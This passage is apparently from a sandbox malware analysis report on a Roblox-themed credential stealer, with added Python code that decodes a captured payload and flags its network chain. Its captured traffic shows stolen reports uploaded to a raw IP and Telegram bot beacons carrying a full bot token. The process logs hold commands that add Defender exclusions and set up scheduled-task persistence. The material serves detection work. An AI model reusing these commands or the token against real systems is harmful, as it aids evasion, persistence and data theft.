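    usable = fragment[: len(fragment) - len(fragment) % 4]
    return base64.b64decode(usable, validate=True)


def guess_xor_key(data: bytes) -> int:
    """Most frequent byte. Right whenever the plaintext is dominated by 0x00, which a PE's
    DOS header and padding are; confirm with a known-plaintext check before trusting it."""
    return Counter(data).most_common(1)[0][0]


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover(fragment: str) -> tuple[int, bytes]:
    """Return (guessed key, decoded-and-unmasked bytes) for a captured base64 fragment."""
    raw = decode_prefix(fragment)
    key = guess_xor_key(raw)
    return key, xor_bytes(raw, key)


def dos_header(plain: bytes) -> dict:
    """Parse the leading IMAGE_DOS_HEADER fields (raises if the fragment is too short)."""
    return dict(zip(DOS_FIELDS, DOS_HEADER.unpack_from(plain, 0)))


def is_pe_prefix(plain: bytes) -> bool:
    """Known-plaintext check: 'MZ' magic plus the relocation-table offset 0x40 that the
    default DOS stub always carries."""
    if len(plain) < DOS_HEADER.size:
        return False
    hdr = dos_header(plain)
    return hdr["e_magic"] == b"MZ" and hdr["e_lfarlc"] == 0x40


if __name__ == "__main__":
    key, plain = recover(CAPTURED_B64)
    print(f"xor key 0x{key:02x}, first bytes {plain[:16].hex()}, PE header: {is_pe_prefix(plain)}")
```

The full body is 175372 base64 characters, about 131 KB once decoded; running the same decode and XOR over the complete capture would yield the rest of the file only if the key holds throughout, which a 48-byte fragment cannot prove on its own.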


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 208.95.112.1 | 80 | 7620 | C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Timestamp | Bytes transferred | Direction | Data
Feb 10, 2024 16:17:17.644812107 CET | 85 | OUT | GET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Feb 10, 2024 16:17:17.759489059 CET | 197 | IN | HTTP/1.1 200 OK
                                                                                                    Date: Sat, 10 Feb 2024 15:17:17 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 27
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    X-Ttl: 60
                                                                                                    X-Rl: 44
                                                                                                    Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 31 2e 31 38 31 2e 35 37 2e 37 34 0a
                                                                                                    Data Ascii: United States81.181.57.74


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 185.119.118.59 | 8080 | 7620 | C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Timestamp | Bytes transferred | Direction | Data
Feb 10, 2024 16:17:18.446048021 CET | 146 | OUT | PUT /41r0r_user%40468325_report.wsr HTTP/1.1
Host: 185.119.118.59:8080
Content-Length: 163338
Expect: 100-continue
Connection: Keep-Alive
Feb 10, 2024 16:17:18.661967039 CET | 25 | IN | HTTP/1.1 100 Continue
Feb 10, 2024 16:17:19.525814056 CET | 382 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/plain
                                                                                                    Server: Transfer.sh HTTP Server
                                                                                                    X-Made-With: <3 by DutchCoders
                                                                                                    X-Served-By: Proudly served by DutchCoders
                                                                                                    X-Url-Delete: http://185.119.118.59:8080/T4zYCSr1rm/41r0r_user@468325_report.wsr/DvYVp3kcgTvwcwH3NgtP
                                                                                                    Date: Sat, 10 Feb 2024 15:17:19 GMT
                                                                                                    Content-Length: 67
                                                                                                    Data Raw: 68 74 74 70 3a 2f 2f 31 38 35 2e 31 31 39 2e 31 31 38 2e 35 39 3a 38 30 38 30 2f 54 34 7a 59 43 53 72 31 72 6d 2f 34 31 72 30 72 5f 6a 6f 6e 65 73 40 34 36 38 33 32 35 5f 72 65 70 6f 72 74 2e 77 73 72
                                                                                                    Data Ascii: http://185.119.118.59:8080/T4zYCSr1rm/41r0r_user@468325_report.wsr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 208.95.112.1 | 80 | 8072 | C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Timestamp | Bytes transferred | Direction | Data
Feb 10, 2024 16:17:18.650660992 CET | 85 | OUT | GET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Feb 10, 2024 16:17:18.827989101 CET | 197 | IN | HTTP/1.1 200 OK
                                                                                                    Date: Sat, 10 Feb 2024 15:17:18 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 27
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    X-Ttl: 60
                                                                                                    X-Rl: 44
                                                                                                    Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 31 2e 31 38 31 2e 35 37 2e 37 34 0a
                                                                                                    Data Ascii: United States81.181.57.74


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 185.119.118.59 | 8080 | 8072 | C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Timestamp | Bytes transferred | Direction | Data
Feb 10, 2024 16:17:19.412488937 CET | 146 | OUT | PUT /hkLYW_user%40468325_report.wsr HTTP/1.1
Host: 185.119.118.59:8080
Content-Length: 163024
Expect: 100-continue
Connection: Keep-Alive
Feb 10, 2024 16:17:19.627897024 CET | 25 | IN | HTTP/1.1 100 Continue
Feb 10, 2024 16:17:20.493516922 CET | 382 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/plain
                                                                                                    Server: Transfer.sh HTTP Server
                                                                                                    X-Made-With: <3 by DutchCoders
                                                                                                    X-Served-By: Proudly served by DutchCoders
                                                                                                    X-Url-Delete: http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user@468325_report.wsr/0CQs5G5XLhl4ycaHU3zO
                                                                                                    Date: Sat, 10 Feb 2024 15:17:20 GMT
                                                                                                    Content-Length: 67
                                                                                                    Data Raw: 68 74 74 70 3a 2f 2f 31 38 35 2e 31 31 39 2e 31 31 38 2e 35 39 3a 38 30 38 30 2f 73 39 56 62 66 65 4a 64 54 73 2f 68 6b 4c 59 57 5f 6a 6f 6e 65 73 40 34 36 38 33 32 35 5f 72 65 70 6f 72 74 2e 77 73 72
                                                                                                    Data Ascii: http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user@468325_report.wsr
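
Sessions 1 to 4 and the HTTPS sessions to api.telegram.org that follow show each stealer process (PID 7620 and PID 8072) working through the same sequence: a geolocation lookup against ip-api.com, a PUT of a .wsr report to 185.119.118.59:8080, then a Telegram Bot API call; PID 6780 only fetches the .txt from 82.147.85.194. The following added example (not part of the Joe Sandbox report) turns that into a small rule set with per-process correlation, run over request records transcribed from the sessions above. The rule names, the HttpRequest record type and the chain ordering are this example's own assumptions, not a vendor signature set.

```python
"""Rule-based triage of the HTTP and HTTPS sessions listed in this report.
Added example, not part of the Joe Sandbox report: the request records are transcribed
from the sessions above; the rules and the per-process correlation are this example's
own heuristics, not a vendor signature set."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class HttpRequest:
    session: str        # report section and session id, e.g. "HTTP/2"
    pid: int
    method: str
    host: str           # Host header as sent, port included where the sample sent one
    path: str           # request target
    content_length: int = 0


# Transcribed from the report. For the two Telegram calls only the path is kept here;
# the query string (the beacon text) is reproduced in full in the HTTPS sessions.
CAPTURED = [
    HttpRequest("HTTP/0", 6780, "GET", "82.147.85.194", "/byte/@jokerbot880901.txt"),
    HttpRequest("HTTP/1", 7620, "GET", "ip-api.com", "/line?fields=query,country"),
    HttpRequest("HTTP/2", 7620, "PUT", "185.119.118.59:8080", "/41r0r_user%40468325_report.wsr", 163338),
    HttpRequest("HTTP/3", 8072, "GET", "ip-api.com", "/line?fields=query,country"),
    HttpRequest("HTTP/4", 8072, "PUT", "185.119.118.59:8080", "/hkLYW_user%40468325_report.wsr", 163024),
    HttpRequest("HTTPS/0", 7620, "GET", "api.telegram.org",
                "/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"),
    HttpRequest("HTTPS/1", 8072, "GET", "api.telegram.org",
                "/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"),
]

RAW_IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
BOT_PATH = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/")
# Order in which each stealer PID in the sessions above worked through its tasks.
STEALER_CHAIN = ("geoip-lookup", "report-upload", "telegram-bot-api")


def match_rules(r: HttpRequest) -> list[str]:
    """Tag one request with every heuristic it trips."""
    hits = []
    if r.host.endswith("ip-api.com") and r.path.startswith(("/line", "/json")):
        hits.append("geoip-lookup")                 # victim geolocation before exfil
    if r.method in ("PUT", "POST") and r.path.lower().endswith(".wsr"):
        hits.append("report-upload")                # .wsr report pushed to a file-drop host
    if r.host == "api.telegram.org" and BOT_PATH.match(r.path):
        hits.append("telegram-bot-api")             # operator notification via bot token
    if r.method == "GET" and RAW_IPV4_HOST.match(r.host) and r.path.lower().endswith(".txt"):
        hits.append("payload-fetch-from-raw-ip")    # ".txt" fetched from a bare IP address
    return hits


def triage_by_pid(requests: list[HttpRequest]) -> dict[int, list[tuple[str, str]]]:
    """Rule hits per process, in the order the requests appear on the wire."""
    by_pid: dict[int, list[tuple[str, str]]] = {}
    for r in requests:
        for hit in match_rules(r):
            by_pid.setdefault(r.pid, []).append((r.session, hit))
    return by_pid


def stealer_pids(requests: list[HttpRequest]) -> set[int]:
    """PIDs that ran the whole chain in order: geo lookup, report upload, Telegram beacon."""
    found = set()
    for pid, hits in triage_by_pid(requests).items():
        stages = [h for _, h in hits]
        positions = [stages.index(s) for s in STEALER_CHAIN if s in stages]
        if len(positions) == len(STEALER_CHAIN) and positions == sorted(positions):
            found.add(pid)
    return found


def exfil_bytes_by_pid(requests: list[HttpRequest]) -> dict[int, int]:
    """Bytes pushed out in report uploads, per process; cross-check against the
    'Report size' the Telegram beacon announces."""
    totals: dict[int, int] = {}
    for r in requests:
        if "report-upload" in match_rules(r):
            totals[r.pid] = totals.get(r.pid, 0) + r.content_length
    return totals


def redact_bot_token(path: str) -> str:
    """Keep the numeric bot id, which identifies the operator account, but strip the
    secret half of the token before the path goes into a ticket or a shared IOC list."""
    return BOT_PATH.sub(lambda m: f"/bot{m.group(1)}:<redacted>/", path)


if __name__ == "__main__":
    for pid, hits in triage_by_pid(CAPTURED).items():
        print(pid, hits)
    print("full stealer chain:", sorted(stealer_pids(CAPTURED)))
    print("exfil bytes:", exfil_bytes_by_pid(CAPTURED))
```

The 163338 bytes PID 7620 uploads are the "0.16Mb" its beacon reports, which is the kind of cross-check that separates a real exfil from a dry run. The X-Url-Delete header in the upload responses carries a bearer-style token; anyone holding that URL can delete the report, so it belongs in the incident record but not in a public indicator list.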


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 149.154.167.220 | 443 | 7620 | C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-10 15:17:20 UTC | 897 | OUT | GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-02-10 15:17:20 UTC | 389 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sat, 10 Feb 2024 15:17:20 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 1193
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-02-10 15:17:20 UTC | 1193 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 33 35 32 32 35 31 35 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 70 61 69 64 56 69 72 75 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 70 61 69 64 56 69 72 75 73 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 31 36 39 37 37 33 33 34 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 62 30 42 69 67 67 65 73 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 52 61 63 6b 20 5c 75 32 37 30 38 5c 75 66 65 30 66 20 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 38 22 2c 22 75 73 65 72 6e 61 6d 65
                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":19,"from":{"id":6352251597,"is_bot":true,"first_name":"KpaidVirus","username":"KpaidVirus_Bot"},"chat":{"id":5169773349,"first_name":"\ud83d\udcb0Biggest","last_name":"Rack \u2708\ufe0f \ud83c\uddfa\ud83c\uddf8","username


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449744149.154.167.2204438072C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-02-10 15:17:21 UTC897OUTGET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: Keep-Alive
2024-02-10 15:17:21 UTC | 389 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sat, 10 Feb 2024 15:17:21 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 1193
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-02-10 15:17:21 UTC | 1193 | IN | Data Ascii: {"ok":true,"result":{"message_id":20,"from":{"id":6352251597,"is_bot":true,"first_name":"KpaidVirus","username":"KpaidVirus_Bot"},"chat":{"id":5169773349,"first_name":"\ud83d\udcb0Biggest","last_name":"Rack \u2708\ufe0f \ud83c\uddfa\ud83c\uddf8","username


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49745 | 149.154.167.220 | 443 | 7620 | C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-10 15:17:21 UTC | 604 | OUT | GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: Keep-Alive
2024-02-10 15:17:22 UTC | 389 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sat, 10 Feb 2024 15:17:21 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 1158
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-02-10 15:17:22 UTC | 1158 | IN | Data Ascii: {"ok":true,"result":{"message_id":21,"from":{"id":6352251597,"is_bot":true,"first_name":"KpaidVirus","username":"KpaidVirus_Bot"},"chat":{"id":5169773349,"first_name":"\ud83d\udcb0Biggest","last_name":"Rack \u2708\ufe0f \ud83c\uddfa\ud83c\uddf8","username


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49746 | 149.154.167.220 | 443 | 8072 | C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-10 15:17:22 UTC | 604 | OUT | GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: Keep-Alive
2024-02-10 15:17:22 UTC | 389 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sat, 10 Feb 2024 15:17:22 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 1158
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-02-10 15:17:22 UTC | 1158 | IN | Data Ascii: {"ok":true,"result":{"message_id":22,"from":{"id":6352251597,"is_bot":true,"first_name":"KpaidVirus","username":"KpaidVirus_Bot"},"chat":{"id":5169773349,"first_name":"\ud83d\udcb0Biggest","last_name":"Rack \u2708\ufe0f \ud83c\uddfa\ud83c\uddf8","username


                                                                                                    Target ID:0
                                                                                                    Start time:16:16:54
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    Imagebase:0x940000
                                                                                                    File size:14'336 bytes
                                                                                                    MD5 hash:7E9A93C69AECFC2BBDA9470FBD4556DB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:16:16:59
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                                                                                                    Imagebase:0x650000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:16:16:59
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:16:17:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:16:17:09
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                                                                                                    Imagebase:0x1f995eb0000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\timeout.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:timeout /t 3
                                                                                                    Imagebase:0x7ff61b030000
                                                                                                    File size:32'768 bytes
                                                                                                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:10
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                                                                                                    Imagebase:0x7ff76f990000
                                                                                                    File size:235'008 bytes
                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

Target ID:11
Start time:16:17:15
Start date:10/02/2024
Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
Imagebase:0x1b8a9a90000
File size:131'528 bytes
MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation:low
Has exited:false

Target ID:12
Start time:16:17:15
Start date:10/02/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
